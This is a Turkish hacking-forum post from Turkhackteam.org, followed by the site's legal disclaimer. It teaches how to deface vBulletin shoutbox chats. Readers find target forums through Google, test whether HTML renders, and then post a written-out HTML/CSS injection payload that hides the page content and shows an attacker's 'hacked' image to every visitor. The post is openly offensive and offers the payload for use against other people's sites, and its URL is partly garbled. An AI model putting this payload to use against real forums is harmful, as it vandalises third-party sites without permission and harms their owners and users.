Vulletin Chat Hack..!

Fatal_Angel

Yeni üye
24 Tem 2006
10
0
Önce GoogLe.CoM a Girip vbuLLetin Shoutbox active forum Diye Aratın Sonra Çıkan SiteLerde Chat Vardır O Chate KOD koyucaz Ama Önce KODLAR AçıKmı Diye ßakaLım Oyuzden Kod:
<Font Color=red>selam</Font>
ßÖyLe SeLâm yazın Eğer Yazdığınız Kırmızı Renkte Çıkarsa KODLar Açıktır , Sonra KodLar aÇıksa Kod:
<body><style type=text/css>table, p, td, tr{visibility:hidden;}body {background-color: #000000;background-image: url('http://www.http://www.hackedresminiz.com%29/;www.hackedresminiz.com);[/URL] }

ßu KoDu Koyun orda www.hackedresminiz.com yazan yere ßi resim Koyun Oraya YönLensin

arkadaşlar yönlendirmede sorun cıkabiliyor.kolay gelsin
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.